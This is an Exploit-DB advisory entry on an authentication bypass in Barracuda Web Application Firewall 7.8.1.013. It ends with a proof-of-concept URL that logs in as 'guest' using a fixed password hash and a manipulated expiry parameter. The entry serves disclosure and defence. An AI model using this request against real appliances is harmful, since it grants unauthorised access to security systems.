Barracuda Web Application Firewall - Authentication Bypass

EDB-ID:

39278




Platform:

Hardware

Date:

2014-08-04


source: https://www.securityfocus.com/bid/69028/info

Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.

An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.

Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest